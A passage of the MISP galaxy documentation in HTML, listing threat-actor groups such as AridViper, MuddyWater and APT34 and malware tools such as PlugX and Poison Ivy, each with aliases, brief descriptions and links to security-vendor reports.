</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://pastebin.com/u/QassamCyberFighters">http://pastebin.com/u/QassamCyberFighters</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://ddanchev.blogspot.com.es/2012/09/dissecting-operation-ababil-osint.html">http://ddanchev.blogspot.com.es/2012/09/dissecting-operation-ababil-osint.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_apt_6"><a class="anchor" href="#_apt_6"></a><a class="link" href="#_apt_6">APT 6</a></h3>
<div class="paragraph">
<p>APT 6 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>1.php Group</p>
</li>
<li>
<p>APT6</p>
</li>
</ul>
</div>
</div>
<div class="sect2">
<h3 id="_aridviper"><a class="anchor" href="#_aridviper"></a><a class="link" href="#_aridviper">AridViper</a></h3>
<div class="paragraph">
<p>AridViper is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Desert Falcon</p>
</li>
<li>
<p>Arid Viper</p>
</li>
<li>
<p>APT-C-23</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2508. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-arid-viper.pdf">http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-arid-viper.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://securityaffairs.co/wordpress/33785/cyber-crime/arid-viper-israel-sex-video.html">http://securityaffairs.co/wordpress/33785/cyber-crime/arid-viper-israel-sex-video.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/blog/research/68817/the-desert-falcons-targeted-attacks/">https://securelist.com/blog/research/68817/the-desert-falcons-targeted-attacks/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://ti.360.com/upload/report/file/APTSWXLVJ8fnjoxck.pdf">https://ti.360.com/upload/report/file/APTSWXLVJ8fnjoxck.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.lookout.com/blog/2017/02/16/viperrat-mobile-apt/">https://blog.lookout.com/blog/2017/02/16/viperrat-mobile-apt/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/blog/incidents/77562/breaking-the-weakest-link-of-the-strongest-chain/">https://securelist.com/blog/incidents/77562/breaking-the-weakest-link-of-the-strongest-chain/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.proofpoint.com/us/threat-insight/post/Operation-Arid-Viper-Slithers-Back-Into-View">https://www.proofpoint.com/us/threat-insight/post/Operation-Arid-Viper-Slithers-Back-Into-View</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.ci-project.org/blog/2017/3/4/arid-viper">https://www.ci-project.org/blog/2017/3/4/arid-viper</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.talosintelligence.com/2017/06/palestine-delphi.html">http://blog.talosintelligence.com/2017/06/palestine-delphi.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.threatconnect.com/blog/kasperagent-malware-campaign/">https://www.threatconnect.com/blog/kasperagent-malware-campaign/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dextorous_spider"><a class="anchor" href="#_dextorous_spider"></a><a class="link" href="#_dextorous_spider">Dextorous Spider</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2509. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.rsaconference.com/writable/presentations/file_upload/anf-t07b-the-art-of-attribution-identifying-and-pursuing-your-cyber-adversaries_final.pdf">https://www.rsaconference.com/writable/presentations/file_upload/anf-t07b-the-art-of-attribution-identifying-and-pursuing-your-cyber-adversaries_final.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_unit_8200"><a class="anchor" href="#_unit_8200"></a><a class="link" href="#_unit_8200">Unit 8200</a></h3>
<div class="paragraph">
<p>Unit 8200 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Duqu Group</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2510. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/blog/research/70504/the-mystery-of-duqu-2-0-a-sophisticated-cyberespionage-actor-returns/">https://securelist.com/blog/research/70504/the-mystery-of-duqu-2-0-a-sophisticated-cyberespionage-actor-returns/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://archive.org/details/Stuxnet">https://archive.org/details/Stuxnet</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_white_bear"><a class="anchor" href="#_white_bear"></a><a class="link" href="#_white_bear">White Bear</a></h3>
<div class="paragraph">
<p>White Bear is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Skipper Turla</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2511. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/introducing-whitebear/81638/">https://securelist.com/introducing-whitebear/81638/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_pale_panda"><a class="anchor" href="#_pale_panda"></a><a class="link" href="#_pale_panda">Pale Panda</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2512. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://go.crowdstrike.com/rs/281-OBQ-266/images/ReportGlobalThreatIntelligence.pdf">http://go.crowdstrike.com/rs/281-OBQ-266/images/ReportGlobalThreatIntelligence.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_mana_team"><a class="anchor" href="#_mana_team"></a><a class="link" href="#_mana_team">Mana Team</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2513. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.isightpartners.com/2016/02/threatscape-media-highlights-update-week-of-february-17th/">https://www.isightpartners.com/2016/02/threatscape-media-highlights-update-week-of-february-17th/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_sowbug"><a class="anchor" href="#_sowbug"></a><a class="link" href="#_sowbug">Sowbug</a></h3>
<div class="paragraph">
<p>Sowbug has been conducting highly targeted cyber attacks against organizations in South America and Southeast Asia and appears to be heavily focused on foreign policy institutions and diplomatic targets. Sowbug has been seen mounting classic espionage attacks by stealing documents from the organizations it infiltrates.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2514. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments">https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_muddywater"><a class="anchor" href="#_muddywater"></a><a class="link" href="#_muddywater">MuddyWater</a></h3>
<div class="paragraph">
<p>The MuddyWater attacks are primarily against Middle Eastern nations. However, we have also observed attacks against surrounding nations and beyond, including targets in India and the USA. MuddyWater attacks are characterized by the use of a slowly evolving PowerShell-based first stage backdoor we call “POWERSTATS”. Despite broad scrutiny and reports on MuddyWater attacks, the activity continues with only incremental changes to the tools and techniques.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2515. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/">https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_moneytaker"><a class="anchor" href="#_moneytaker"></a><a class="link" href="#_moneytaker">MoneyTaker</a></h3>
<div class="paragraph">
<p>In less than two years, this group has conducted over 20 successful attacks on financial institutions and legal firms in the USA, UK and Russia. The group has primarily been targeting card processing systems, including the AWS CBR (Russian Interbank System) and purportedly SWIFT (US). Given the wide usage of STAR in LATAM, financial institutions in LATAM could have particular exposure to a potential interest from the MoneyTaker group.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2516. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/moneytaker-hacker-group-steals-millions-from-us-and-russian-banks/">https://www.bleepingcomputer.com/news/security/moneytaker-hacker-group-steals-millions-from-us-and-russian-banks/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.group-ib.com/resources/reports/money-taker.html">https://www.group-ib.com/resources/reports/money-taker.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.group-ib.com/blog/moneytaker">https://www.group-ib.com/blog/moneytaker</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_microcin"><a class="anchor" href="#_microcin"></a><a class="link" href="#_microcin">Microcin</a></h3>
<div class="paragraph">
<p>Were already used to the fact that complex cyberattacks use 0-day vulnerabilities, bypassing digital signature checks, virtual file systems, non-standard encryption algorithms and other tricks. Sometimes, however, all of this may be done in much simpler ways, as was the case in the malicious campaign that we detected a while ago we named it Microcin after microini, one of the malicious components used in it.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2517. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/a-simple-example-of-a-complex-cyberattack/82636/">https://securelist.com/a-simple-example-of-a-complex-cyberattack/82636/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://cdn.securelist.com/files/2017/09/Microcin_Technical_4PDF_eng_final_s.pdf">https://cdn.securelist.com/files/2017/09/Microcin_Technical_4PDF_eng_final_s.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dark_caracal"><a class="anchor" href="#_dark_caracal"></a><a class="link" href="#_dark_caracal">Dark Caracal</a></h3>
<div class="paragraph">
<p>Lookout and Electronic Frontier Foundation (EFF) have discovered Dark Caracal, a persistent and prolific actor, who at the time of writing is believed to be administered out of a building belonging to the Lebanese General Security Directorate in Beirut. At present, we have knowledge of hundreds of gigabytes of exfiltrated data, in 21+ countries, across thousands of victims. Stolen data includes enterprise intellectual property and personally identifiable information.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2518. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf">https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_nexus_zeta"><a class="anchor" href="#_nexus_zeta"></a><a class="link" href="#_nexus_zeta">Nexus Zeta</a></h3>
<div class="paragraph">
<p>Nexus Zeta is no stranger when it comes to implementing SOAP related exploits. The threat actor has already been observed in implementing two other known SOAP related exploits, CVE-20148361 and CVE-201717215 in his Satori botnet project. A third SOAP exploit, TR-069 bug has also been observed previously in IoT botnets. This makes EDB 38722 the fourth SOAP related exploit which is discovered in the wild by IoT botnets.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2519. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.newskysecurity.com/masuta-satori-creators-second-botnet-weaponizes-a-new-router-exploit-2ddc51cc52a7">https://blog.newskysecurity.com/masuta-satori-creators-second-botnet-weaponizes-a-new-router-exploit-2ddc51cc52a7</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_apt37"><a class="anchor" href="#_apt37"></a><a class="link" href="#_apt37">APT37</a></h3>
<div class="paragraph">
<p>APT37 has likely been active since at least 2012 and focuses on targeting the public and private sectors primarily in South Korea. In 2017, APT37 expanded its targeting beyond the Korean peninsula to include Japan, Vietnam and the Middle East, and to a wider range of industry verticals, including chemicals, electronics, manufacturing, aerospace, automotive and healthcare entities</p>
</div>
<div class="paragraph">
<p>APT37 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>APT 37</p>
</li>
<li>
<p>Group 123</p>
</li>
<li>
<p>Starcruft</p>
</li>
<li>
<p>Reaper</p>
</li>
<li>
<p>Red Eyes</p>
</li>
<li>
<p>Ricochet Chollima</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2520. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2018/02/apt37-overlooked-north-korean-actor.html">https://www.fireeye.com/blog/threat-research/2018/02/apt37-overlooked-north-korean-actor.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf">https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html">http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/mstoned7/status/966126706107953152">https://twitter.com/mstoned7/status/966126706107953152</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_leviathan"><a class="anchor" href="#_leviathan"></a><a class="link" href="#_leviathan">Leviathan</a></h3>
<div class="paragraph">
<p>Leviathan is an espionage actor targeting organizations and high-value targets in defense and government. Active since at least 2014, this actor has long-standing interest in maritime industries, naval defense contractors, and associated research institutions in the United States and Western Europe.</p>
</div>
<div class="paragraph">
<p>Leviathan is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>TEMP.Periscope</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2521. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets">https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html">https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_apt34"><a class="anchor" href="#_apt34"></a><a class="link" href="#_apt34">APT34</a></h3>
<div class="paragraph">
<p>Since at least 2014, an Iranian threat group tracked by FireEye as APT34 has conducted reconnaissance aligned with the strategic interests of Iran. The group conducts operations primarily in the Middle East, targeting financial, government, energy, chemical, telecommunications and other industries. Repeated targeting of Middle Eastern financial, energy and government organizations leads FireEye to assess that those sectors are a primary concern of APT34. The use of infrastructure tied to Iranian operations, timing and alignment with the national interests of Iran also lead FireEye to assess that APT34 acts on behalf of the Iranian government.</p>
</div>
<div class="paragraph">
<p>APT34 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>APT 34</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2522. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf">https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.wired.com/story/apt-34-iranian-hackers-critical-infrastructure-companies/" class="bare">https://www.wired.com/story/apt-34-iranian-hackers-critical-infrastructure-companies/</a> [<a href="https://www.wired.com/story/apt-34-iranian-hackers-critical-infrastructure-companies/" class="bare">https://www.wired.com/story/apt-34-iranian-hackers-critical-infrastructure-companies/</a> ]</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html">https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_apt35"><a class="anchor" href="#_apt35"></a><a class="link" href="#_apt35">APT35</a></h3>
<div class="paragraph">
<p>FireEye has identified APT35 operations dating back to 2014. APT35, also known as the Newscaster Team, is a threat group sponsored by the Iranian government that conducts long term, resource-intensive operations to collect strategic intelligence. APT35 typically targets U.S. and the Middle Eastern military, diplomatic and government personnel, organizations in the media, energy and defense industrial base (DIB), and engineering, business services and telecommunications sectors.</p>
</div>
<div class="paragraph">
<p>APT35 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>APT 35</p>
</li>
<li>
<p>Newscaster Team</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2523. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf">https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="sect1">
<h2 id="_tool_2"><a class="anchor" href="#_tool_2"></a><a class="link" href="#_tool_2">Tool</a></h2>
<div class="sectionbody">
<div class="paragraph">
<p>threat-actor-tools is an enumeration of tools used by adversaries. The list includes malware but also common software regularly used by the adversaries..</p>
</div>
<div class="admonitionblock note">
<table>
<tr>
<td class="icon">
<i class="fa icon-note" title="Note"></i>
</td>
<td class="content">
Tool is a cluster galaxy available in JSON format at <a href="https://github.com/MISP/misp-galaxy/blob/master/clusters/tool.json"><strong>this location</strong></a> The JSON format can be freely reused in your application or automatically enabled in <a href="https://www.github.com/MISP/MISP">MISP</a>.
</td>
</tr>
</table>
</div>
<div class="dlist">
<dl>
<dt class="hdlist1">authors</dt>
<dd>
<p>Alexandre Dulaunoy - Florian Roth - Timo Steffens - Christophe Vandeplas - Dennis Rand</p>
</dd>
</dl>
</div>
<div class="sect2">
<h3 id="_tinba_2"><a class="anchor" href="#_tinba_2"></a><a class="link" href="#_tinba_2">Tinba</a></h3>
<div class="paragraph">
<p>Banking Malware</p>
</div>
<div class="paragraph">
<p>Tinba is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Hunter</p>
</li>
<li>
<p>Zusy</p>
</li>
<li>
<p>TinyBanker</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2524. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://thehackernews.com/search/label/Zusy%20Malware">https://thehackernews.com/search/label/Zusy%20Malware</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.trendmicro.com/trendlabs-security-intelligence/the-tinbatinybanker-malware/">http://blog.trendmicro.com/trendlabs-security-intelligence/the-tinbatinybanker-malware/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_plugx_3"><a class="anchor" href="#_plugx_3"></a><a class="link" href="#_plugx_3">PlugX</a></h3>
<div class="paragraph">
<p>Malware</p>
</div>
<div class="paragraph">
<p>PlugX is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Backdoor.FSZO-5117</p>
</li>
<li>
<p>Trojan.Heur.JP.juW@ayZZvMb</p>
</li>
<li>
<p>Trojan.Inject1.6386</p>
</li>
<li>
<p>Korplug</p>
</li>
<li>
<p>Agent.dhwf</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2525. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.trendmicro.com/vinfo/us/threat-encyclopedia/web-attack/112/pulling-the-plug-on-plugx">https://www.trendmicro.com/vinfo/us/threat-encyclopedia/web-attack/112/pulling-the-plug-on-plugx</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_msupdater"><a class="anchor" href="#_msupdater"></a><a class="link" href="#_msupdater">MSUpdater</a></h3>
<div class="literalblock">
<div class="content">
<pre>Trojan (RAT) linked to current targeted attacks and others dating back to at least early 2009</pre>
</div>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2526. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.zscaler.com/pdf/whitepapers/msupdater_trojan_whitepaper.pdfx">https://www.zscaler.com/pdf/whitepapers/msupdater_trojan_whitepaper.pdfx</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_lazagne"><a class="anchor" href="#_lazagne"></a><a class="link" href="#_lazagne">Lazagne</a></h3>
<div class="paragraph">
<p>A password sthealing tool regularly used by attackers</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2527. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/AlessandroZ/LaZagne">https://github.com/AlessandroZ/LaZagne</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_poison_ivy"><a class="anchor" href="#_poison_ivy"></a><a class="link" href="#_poison_ivy">Poison Ivy</a></h3>
<div class="paragraph">
<p>Poison Ivy is a RAT which was freely available and first released in 2005.</p>
</div>
<div class="paragraph">
<p>Poison Ivy is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Backdoor.Win32.PoisonIvy</p>
</li>
<li>
<p>Gen:Trojan.Heur.PT</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2528. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-poison-ivy.pdf">https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-poison-ivy.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.f-secure.com/v-descs/backdoor_w32_poisonivy.shtml">https://www.f-secure.com/v-descs/backdoor_w32_poisonivy.shtml</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_spivy"><a class="anchor" href="#_spivy"></a><a class="link" href="#_spivy">SPIVY</a></h3>
<div class="paragraph">
<p>In March 2016, Unit 42 observed this new Poison Ivy variant weve named SPIVY being deployed via weaponized documents leveraging CVE-2015-2545.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2529. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2016/04/unit42-new-poison-ivy-rat-variant-targets-hong-kong-pro-democracy-activists/">http://researchcenter.paloaltonetworks.com/2016/04/unit42-new-poison-ivy-rat-variant-targets-hong-kong-pro-democracy-activists/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_torn_rat"><a class="anchor" href="#_torn_rat"></a><a class="link" href="#_torn_rat">Torn RAT</a></h3>
<div class="paragraph">
<p>Torn RAT is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Anchor Panda</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2530. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.crowdstrike.com/blog/whois-anchor-panda/">https://www.crowdstrike.com/blog/whois-anchor-panda/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ozonerat"><a class="anchor" href="#_ozonerat"></a><a class="link" href="#_ozonerat">OzoneRAT</a></h3>
<div class="paragraph">
<p>OzoneRAT is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Ozone RAT</p>
</li>
<li>
<p>ozonercp</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2531. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.fortinet.com/2016/08/29/german-speakers-targeted-by-spam-leading-to-ozone-rat">https://blog.fortinet.com/2016/08/29/german-speakers-targeted-by-spam-leading-to-ozone-rat</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_zeghost"><a class="anchor" href="#_zeghost"></a><a class="link" href="#_zeghost">ZeGhost</a></h3>
<div class="paragraph">
<p>ZeGhots is a RAT which was freely available and first released in 2014.</p>
</div>
<div class="paragraph">
<p>ZeGhost is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>BackDoor-FBZT!52D84425CDF2</p>
</li>
<li>
<p>Trojan.Win32.Staser.ytq</p>
</li>
<li>
<p>Win32/Zegost.BW</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2532. Table References</caption>
<colgroup>
<col style="width: 100%;">
